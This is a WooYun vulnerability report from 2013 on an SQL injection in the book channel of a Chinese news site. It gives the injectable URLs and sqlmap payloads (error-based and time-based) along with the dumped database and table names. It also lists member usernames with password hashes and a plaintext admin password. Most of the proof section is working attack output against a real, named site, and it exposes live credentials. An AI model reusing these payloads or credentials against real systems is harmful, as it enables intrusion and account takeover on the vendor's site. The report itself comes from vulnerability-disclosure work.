当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046478

漏洞标题:南海网#某分站SQL注入漏洞

相关厂商:南海网

漏洞作者: 小驴牙牙

提交时间:2013-12-19 17:01

修复时间:2013-12-24 17:01

公开时间:2013-12-24 17:01

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-19: 细节已通知厂商并且等待厂商处理中
2013-12-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

隐秘的SQL注入,希望上主页

详细说明:

南海网读书频道:http://book.hinews.cn/
隐秘注射点:orderby这个字段存在注入
http://book.hinews.cn/search.php?chid=&sid=0?searchword=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E5%AD%97&caid=0&ccid4=0&indays=0&ordermode=0&searchsubmit=1&orderby=createdate'
未修复的注射点:
http://book.hinews.cn/list.php?caid=27
http://book.hinews.cn/archive.php?aid=541347

漏洞证明:

1.当前用户:

---
Place: GET
Parameter: orderby
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: chid=&sid=0?searchword=请输入关键字&caid=0&ccid4=0&indays=0&ordermode=0&searchsubmit=1&orderby=createdate AND (SELECT 4149 FROM(SELECT COUNT(*),CONCAT(0x3a7967703a,(SELECT (CASE WHEN (4149=4149) THEN 1 ELSE 0 END)),0x3a7367653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: chid=&sid=0?searchword=请输入关键字&caid=0&ccid4=0&indays=0&ordermode=0&searchsubmit=1&orderby=createdate AND SLEEP(5)
---
current user:    'books_user@192.168.%'


2.可跨库:

available databases [3]:
[*] dbbooks
[*] information_schema
[*] test


3.数据库dbbooks包含的表:

Database: dbbooks
[122 tables]
+-------------------+
| cms_alangs        |
| cms_albums        |
| cms_amconfigs     |
| cms_amsgs         |
| cms_answers       |
| cms_archives      |
| cms_archives_1    |
| cms_archives_2    |
| cms_archives_3    |
| cms_archives_4    |
| cms_archives_5    |
| cms_archives_rec  |
| cms_archives_sub  |
| cms_arecents      |
| cms_asession      |
| cms_aurls         |
| cms_badwords      |
| cms_btagnames     |
| cms_catalogs      |
| cms_channels      |
| cms_clangs        |
| cms_cmsgs         |
| cms_cnconfigs     |
| cms_cnfields      |
| cms_cnodes        |
| cms_coclass       |
| cms_comments      |
| cms_commus        |
| cms_consults      |
| cms_cotypes       |
| cms_cradminlogs   |
| cms_crprices      |
| cms_crprojects    |
| cms_cucatalogs    |
| cms_cufields      |
| cms_currencys     |
| cms_dbfields      |
| cms_dbsources     |
| cms_extracts      |
| cms_farchives     |
| cms_farchives_1   |
| cms_farchives_2   |
| cms_farchives_3   |
| cms_farchives_4   |
| cms_farchives_5   |
| cms_favorites     |
| cms_fcatalogs     |
| cms_fchannels     |
| cms_ffields       |
| cms_fields        |
| cms_forders       |
| cms_freeinfos     |
| cms_gmissions     |
| cms_gmodels       |
| cms_grouptypes    |
| cms_gurls         |
| cms_inmurls       |
| cms_inurls        |
| cms_keywords      |
| cms_localfiles    |
| cms_logerrortimes |
| cms_mafields      |
| cms_matypes       |
| cms_mcatalogs     |
| cms_mchannels     |
| cms_mcomments     |
| cms_mcommus       |
| cms_mconfigs      |
| cms_mcufields     |
| cms_members       |
| cms_members_1     |
| cms_members_sub   |
| cms_menus         |
| cms_mfavorites    |
| cms_mfields       |
| cms_mflinks       |
| cms_mfriends      |
| cms_mlangs        |
| cms_mmenus        |
| cms_mmsgs         |
| cms_mmtypes       |
| cms_mprojects     |
| cms_mreplys       |
| cms_mreports      |
| cms_msession      |
| cms_mtconfigs     |
| cms_mtrans        |
| cms_mtypes        |
| cms_murls         |
| cms_offers        |
| cms_orders        |
| cms_pays          |
| cms_permissions   |
| cms_players       |
| cms_pms           |
| cms_purchases     |
| cms_replys        |
| cms_reports       |
| cms_repugrades    |
| cms_repus         |
| cms_rprojects     |
| cms_shipings      |
| cms_sitemaps      |
| cms_splangs       |
| cms_sptpls        |
| cms_subscribes    |
| cms_subsites      |
| cms_uclasses      |
| cms_ucoclass      |
| cms_ucotypes      |
| cms_uprojects     |
| cms_userfiles     |
| cms_usergroups    |
| cms_userurls      |
| cms_usualurls     |
| cms_utrans        |
| cms_utypes        |
| cms_vcatalogs     |
| cms_vols          |
| cms_voptions      |
| cms_votes         |
| cms_wordlinks     |
+-------------------+


4.cm_members

Database: dbbooks
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| cms_members | 9       |
+-------------+---------+


5.管理员账户密码:

Database: dbbooks
Table: cms_members
[9 entries]
+-------+----------------------------------+
| mname | password                         |
+-------+----------------------------------+
| admin | 8e09d565470a4f5990a4489e3da5dbe1 |
| aaaaa | b427c90b069896a917d44ad8c9407cc5 |
| bbbbb | b4a677e8e15e8d797cff157c6ce9feef |
| 08cms | 4fd90e24d9df0a2074fbc9506d771b5a |
| ccccc | 108cc6ccf5b44ff898357e18f265c6cb |
| 匿名    | d19bc5de241d390220b17db7f79e0a8a |
| 评论网友  | 14e1b600b1fd579f47433b88e8d85291 |
| echo  | 63ee451939ed580ef3c4b6f0109d1fd0 |
| helen | 21331de39c59dd108cb55bbbc42deedf |
+-------+----------------------------------+


密码是:hinews@2011

修复方案:

修复!

版权声明:转载请注明来源 小驴牙牙@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-24 17:01

厂商回复:

最新状态:

暂无